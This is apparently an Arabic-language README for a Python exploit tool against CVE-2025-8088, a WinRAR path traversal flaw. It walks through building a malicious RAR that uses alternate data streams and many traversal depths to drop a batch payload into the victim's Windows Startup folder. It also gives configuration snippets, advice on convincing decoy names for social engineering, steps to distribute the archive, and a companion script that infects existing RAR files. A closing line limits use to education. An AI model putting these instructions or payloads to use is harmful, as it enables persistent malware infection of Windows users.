
استغلال الأنظمة التي تستخدم إصدارات WinRAR الأقدم دون معرفة اسم المستخدم الخاص بها (على عكس المشاريع الأخرى)


يستغل هذا السكربت المكتوب بلغة بايثون ثغرة اجتياز المسار (CVE-2025-8088) في WinRAR لنشر الحمولات إلى مجلد بدء تشغيل ويندوز باستخدام أعماق مسارات نسبية متعددة. يقوم الاستغلال بإنشاء أرشيف RAR خبيث، وعند فك ضغطه، يكتب الحمولات إلى مجلد بدء التشغيل الخاص بالضحية على أعماق دليل مختلفة.
ينشئ السكربت ملفات وهمية متعددة (20 افتراضيًا)، كل منها مُهيأ لاجتياز عدد مختلف من الأدلة الأم:
NUM_DEPTHS = 20 # Number of different traversal depths
يستخدم كل ملف عمق مسار مختلف:
File1.txt → ..\Startup\payload.bat
File2.txt → ..\..\Startup\payload.bat
...
File20.txt → ..\..\..\ (20 times) \Startup\payload.bat
✅ يضمن أنه أينما فك الضحية الأرشيف (سطح المكتب، المستندات، التنزيلات، أو مجلدات متداخلة)، ستصل حمولة واحدة على الأقل إلى مجلد بدء التشغيل.
تحتوي الملفات الوهمية على نص عام افتراضيًا ولكن يجب تخصيصها لهندسة اجتماعية واقعية:
# Create more convincing decoy content
decoy.write_text("Quarterly Financial Report Q3 2025.docx\n", encoding="utf-8")
لماذا تغيير محتوى الملفات الوهمية؟
الحمولة عبارة عن سكربت دفعي بسيط افتراضيًا ويمكن استبدالها بأي ملف تنفيذي:
PAYLOAD = "@echo off\necho Payload executed!\npause\n"
موقع الحمولة:
AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\payload.bat
يُحفظ أرشيف RAR الخبيث النهائي باسم:
OUT_RAR = "exploit.rar"
يتطلب بناء هذا الاستغلال بيئة ويندوز لعدة أسباب:
الاعتماد على تدفقات البيانات البديلة (ADS)
ميزة حصرية لنظام NTFS تُستخدم لإرفاق الحمولات:
ads_path = f"{decoy}:{placeholder}" # Windows-specific NTFS syntax
اشتراط ملف WinRAR التنفيذي
يستخدم واجهة الأوامر الخاصة بـ WinRAR على ويندوز:
subprocess.run(f'"{rar_exe}" a -ep -os "{base_rar}" ...')
توافق بنية المسار
يستهدف مسارات ويندوز المحددة:
RELATIVE_DROP_PATH = "AppData\\Roaming\\Microsoft\\Windows\\Start Menu..."
تنفيذ الحمولة
يولّد ملفات دفعية لويندوز:
@echo off
start /B notepad.exe
خصّص الإعدادات:
# Configuration
NUM_DEPTHS = 20
RELATIVE_DROP_PATH = "AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\payload.bat"
PAYLOAD = "@echo off\nstart /B notepad.exe\n" # Your actual payload
DECOY_FILE_PREFIX = "Financial_Report_Q3_" # More convincing names
شغّل السكربت:
python CVE-2025-8088.py
وزّع الملف الناتج:
exploit.rarهذا الإصدار من الكود يتيح لك ببساطة تشغيل شيء مثل
python3 infect_premade_rarfiles.py website_backup.rar
سيقوم باستخراج جميع الملفات، وحقن ما يمكنه حقنه مثل .txt و srt و sql (ليست كل أنواع الملفات تعمل) ثم إنشاء ملف rar الجاهز للتشغيل.
⚠️ هذه الأداة لأغراض تعليمية وأبحاث أمنية فقط.
لا تستخدمها أبدًا ضد أنظمة دون إذن صريح. الاستخدام غير المصرح به غير قانوني وغير أخلاقي.